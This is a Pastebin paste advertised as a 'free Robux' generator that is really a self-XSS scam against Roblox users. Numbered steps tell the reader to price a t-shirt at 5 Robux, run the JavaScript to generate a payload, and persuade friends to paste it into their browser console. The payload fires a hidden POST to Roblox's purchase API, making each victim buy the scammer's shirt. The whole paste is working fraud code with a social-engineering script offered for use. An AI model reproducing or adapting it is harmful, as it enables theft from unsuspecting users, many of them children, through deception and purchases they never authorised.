Advertisement
URBAN420NETWORK

Working Free Robux ( script generator )

Oct 27th, 2016
21,372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //How to get free ROBUX using the catalog
  2. //step 1) create a t-shirt and make the price 5 robux
  3. //step 2) go to the buy page for your t-shirt and press Ctrl+Shift+J (only works on chrome)
  4. //step 3) copy this entire script and paste in in the console
  5. //step 4) it should say some stuff starting with //script by urban and ending with //created by urban
  6. //step 5) copy the stuff between those two lines and save it somewhere
  7. //step 6) tell a friend you found a free robux script
  8. //step 7) if they ask how tell them to go on roblox.com, press Ctrl+Shift+J, then send them the script starting with //script by urban and ending with //created by urban and tell them to type it in the console and press enter. if they do this you get 5 robux
  9. //step 8) do step 6 and step 7 but with as many people as you can find for more robux
  10.  
  11.  
  12. var btnData = document.getElementsByClassName("btn-fixed-width-lg btn-primary-lg PurchaseButton")[0].attributes;
  13. var buyData = document.getElementById("item-container").attributes;
  14. var newScript = "var buy = 'https://www.roblox.com/API/Item.ashx?rqtype=purchase&productID=ABC420YOLO&expectedCurrency=1&expectedPrice=ABC123YOLO&expectedSellerId=ABC360YOLO&userAssetID=ABC207YOLO'; $.ajax({ url: buy, type: 'POST' });";
  15.  
  16. function loadAttributes(data, name) {
  17.     for(var i = 0; i < data.length; i++) {
  18.         if(data[i].name.indexOf('data-product-id') >= 0) {
  19.             newScript = newScript.replace('ABC420YOLO', data[i].value);
  20.         }
  21.         if(data[i].name.indexOf('data-expected-price') >= 0) {
  22.             newScript = newScript.replace('ABC123YOLO', data[i].value);
  23.         }
  24.         if(data[i].name.indexOf('data-expected-seller-id') >= 0) {
  25.             newScript = newScript.replace('ABC360YOLO', data[i].value);
  26.         }
  27.         if(data[i].name.indexOf('data-userasset-id') >= 0) {
  28.             newScript = newScript.replace('ABC207YOLO', data[i].value);
  29.         }
  30.     }
  31. }
  32.  
  33. loadAttributes(btnData, 'btnData');
  34. loadAttributes(buyData, 'buyData');
  35.  
  36. console.log("//script by urban420 network\n" + newScript + "\n//created by urban420 network");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement